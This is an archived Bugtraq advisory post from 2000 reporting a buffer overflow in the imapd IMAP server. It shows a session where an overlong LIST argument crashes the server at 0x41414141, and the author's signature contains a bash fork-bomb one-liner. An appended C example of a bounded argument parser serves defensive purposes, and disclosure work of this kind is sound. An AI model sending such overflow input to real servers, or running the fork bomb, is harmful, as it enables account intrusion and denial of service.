[14534] in bugtraq


imapd4r1 v12.264

daemon@ATHENA.MIT.EDU (Michal Zalewski)
Sun Apr 16 22:13:25 2000

Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-2
Message-Id:  <Pine.LNX.4.21.0004161411480.2819-100000@dione.ids.pl>
Date:         Sun, 16 Apr 2000 14:19:43 +0200
Reply-To: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
From: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit

Newest RH:

* OK nimue IMAP4rev1 v12.264 server ready
1 login lcamtuf test
1 OK LOGIN completed
1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;] 
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

*sigh*

Privileges seem to be dropped, but, anyway, it's a nice way to get shell
access to a mail account, maybe grab some data from memory etc. I believe
both imap and ipopd packages need a code security audit.

_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=




===========================================================================
This message came from the list <secure@mud.pl>
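
In the session above, an overlong LIST argument left the program counter at 0x41414141. The following is an added example, not code from imapd or from the original post: a bounded parser for the two LIST arguments that rejects oversized input before any byte is stored. The function names, return codes and the 255-byte limit are assumptions made for this example.

```c
#include <stddef.h>
#include <string.h>

#define MAILBOX_MAX 255  /* assumed limit; callers pass buffers of MAILBOX_MAX + 1 */

enum { ARG_OK = 0, ARG_MALFORMED = -1, ARG_TOO_LONG = -2 };

/* Copy one IMAP astring (quoted string or atom) from *p into out[outlen].
 * The length is checked before each byte is stored, so an oversized
 * argument is rejected instead of running past the end of out. */
static int read_astring(const char **p, char *out, size_t outlen)
{
    const char *s = *p;
    size_t n = 0;
    int quoted = (*s == '"');

    if (quoted)
        s++;
    for (;;) {
        char c = *s;
        if (quoted) {
            if (c == '\0') return ARG_MALFORMED;   /* unterminated quote */
            if (c == '"') { s++; break; }
            if (c == '\\') {                       /* escaped character */
                c = *++s;
                if (c == '\0') return ARG_MALFORMED;
            }
        } else if (c == '\0' || c == ' ') {
            break;                                 /* end of atom */
        }
        if (n + 1 >= outlen) return ARG_TOO_LONG;  /* keep room for the NUL */
        out[n++] = c;
        s++;
    }
    if (!quoted && n == 0) return ARG_MALFORMED;   /* empty atom */
    out[n] = '\0';
    *p = s;
    return ARG_OK;
}

/* Parse the text after "LIST ": <reference> SP <mailbox-pattern>. */
int parse_list_args(const char *args, char *ref, char *pat, size_t buflen)
{
    int rc;
    if (buflen == 0) return ARG_MALFORMED;
    if ((rc = read_astring(&args, ref, buflen)) != ARG_OK) return rc;
    if (*args++ != ' ') return ARG_MALFORMED;
    if ((rc = read_astring(&args, pat, buflen)) != ARG_OK) return rc;
    return *args == '\0' ? ARG_OK : ARG_MALFORMED;
}
```

A server using a check like this would answer the oversized command with a tagged BAD response and log the event, since a multi-kilobyte mailbox name is a useful detection signal in itself.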
